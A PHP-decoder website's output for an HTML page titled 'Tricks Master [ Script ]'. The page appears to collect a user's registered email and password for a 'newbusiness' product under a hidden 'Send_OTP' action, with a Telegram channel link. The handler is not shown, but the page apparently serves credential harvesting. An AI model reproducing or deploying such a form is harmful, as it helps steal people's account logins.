Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<!doctype html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="..

Decoded Output download

<?  <!doctype html> 
<html lang="en"> 
 <head> 
  <meta charset="UTF-8"> 
  <meta http-equiv="X-UA-Compatible" content="IE=edge"> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <script src="https://kit.fontawesome.com/3ea3574147.js" crossorigin="anonymous"></script> 
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> 
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css"> 
  <link rel="icon" href="https://r4u.in/logo.png" type="image/x-icon"> 
  <link rel="preconnect" href="https://fonts.googleapis.com"> 
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> 
  <link href="https://fonts.googleapis.com/css2?family=Bree+Serif&amp;family=Lobster&amp;family=Righteous&amp;display=swap" rel="stylesheet"> 
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/boxicons@latest/css/boxicons.min.css"> 
  <title>Tricks Master [ Script ]</title> 
  <script> 
document.write(unescape('%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%2F%74%6D%2E%63%73%73%22%20%6F%6E%65%72%72%6F%72%3D%22%74%68%69%73%2E%6F%6E%65%72%72%6F%72%3D%6E%75%6C%6C%3B%74%68%69%73%2E%68%72%65%66%3D%27%74%6D%2E%63%73%73%27%3B%22%3E')); 
</script> 
 </head> 
 <body> 
  <div class="main-container"> 
   <div class="heading-text"> 
    newbusiness Product BuY 
   </div> 
   <form action="" method="POST"> 
    <input type="hidden" name="action" class="input" value="Send_OTP" required> <input type="email" name="email" class="input" placeholder="Enter Registered Email ID" minlength="" maxlength="" required> <input type="text" name="pass" class="input" placeholder="Enter Your Password" required> <input type="submit" name="submit" class="button shine" value="Submit"> 
   </form><a href="tg://resolve?domain=tricksmaster111" class="telBtn"> <i class="fa-regular fa-paper-plane"></i><span>Join Our Telegram Channel</span> </a> 
  </div> 
 </body> 
</html> ?>

Did this file decode correctly?

Original Code

<!doctype html>
<html lang="en">
 <head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <script src="https://kit.fontawesome.com/3ea3574147.js" crossorigin="anonymous"></script>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
  <link rel="icon" href="https://r4u.in/logo.png" type="image/x-icon">
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Bree+Serif&amp;family=Lobster&amp;family=Righteous&amp;display=swap" rel="stylesheet">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/boxicons@latest/css/boxicons.min.css">
  <title>Tricks Master [ Script ]</title>
  <script>
document.write(unescape('%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%2F%74%6D%2E%63%73%73%22%20%6F%6E%65%72%72%6F%72%3D%22%74%68%69%73%2E%6F%6E%65%72%72%6F%72%3D%6E%75%6C%6C%3B%74%68%69%73%2E%68%72%65%66%3D%27%74%6D%2E%63%73%73%27%3B%22%3E'));
</script>
 </head>
 <body>
  <div class="main-container">
   <div class="heading-text">
    newbusiness Product BuY
   </div>
   <form action="" method="POST">
    <input type="hidden" name="action" class="input" value="Send_OTP" required> <input type="email" name="email" class="input" placeholder="Enter Registered Email ID" minlength="" maxlength="" required> <input type="text" name="pass" class="input" placeholder="Enter Your Password" required> <input type="submit" name="submit" class="button shine" value="Submit">
   </form><a href="tg://resolve?domain=tricksmaster111" class="telBtn"> <i class="fa-regular fa-paper-plane"></i><span>Join Our Telegram Channel</span> </a>
  </div>
 </body>
</html>

Function Calls

None

Variables

None

Stats

MD5 22aa61e8ea4d1b938eeec0a03a186e4a
Eval Count 0
Decode Time 55 ms